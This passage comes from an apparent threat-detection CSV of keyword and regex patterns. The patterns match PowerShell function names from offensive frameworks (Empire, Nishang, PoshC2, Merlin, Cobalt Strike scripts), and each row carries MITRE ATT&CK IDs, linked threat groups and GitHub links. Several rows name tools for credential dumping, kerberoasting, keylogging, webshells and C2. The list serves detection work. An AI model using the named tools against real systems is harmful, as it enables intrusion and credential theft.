Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Interceptor*",".{0,1000}Invoke\-Interceptor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Interceptor.ps1*",".{0,1000}Invoke\-Interceptor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-InternalMonologue*",".{0,1000}Invoke\-InternalMonologue.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InternalMonologue.ps1*",".{0,1000}Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - 
T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InveighRelay*",".{0,1000}Invoke\-InveighRelay.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InveighRelay.ps1*",".{0,1000}Invoke\-InveighRelay\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-InviteGuest*",".{0,1000}Invoke\-InviteGuest.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Invites a guest user to the tenant","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-IR*",".{0,1000}Invoke\-IR.{0,1000}","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*Invoke-IronCyclone*",".{0,1000}Invoke\-IronCyclone.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JuicyPotato*",".{0,1000}Invoke\-JuicyPotato.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-kerberoast *",".{0,1000}invoke\-kerberoast\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 
"*invokekerberoast*",".{0,1000}invokekerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Ninja","Open source 
C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Kerberoast.ps1*",".{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Keylogger.ps1*",".{0,1000}Invoke\-Keylogger\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Kirby*",".{0,1000}Invoke\-Kirby.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-KrbRelay*",".{0,1000}Invoke\-KrbRelay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" 
"*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-LazySign.ps1*",".{0,1000}Invoke\-LazySign\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" 
"*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Lockless*",".{0,1000}Invoke\-Lockless.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Locksmith.ps1*",".{0,1000}Invoke\-Locksmith\.ps1.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - 
TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "*Invoke-LoginPrompt.ps1*",".{0,1000}Invoke\-LoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Invoke-LSADump*",".{0,1000}Invoke\-LSADump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-LsaProtectionCheck*",".{0,1000}Invoke\-LsaProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-LsaProtectionsCheck*",".{0,1000}Invoke\-LsaProtectionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-LSWMImplant*",".{0,1000}Invoke\-LSWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-M.i.m.i.k.a.t.z*",".{0,1000}Invoke\-M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-MachineRoleCheck*",".{0,1000}Invoke\-MachineRoleCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
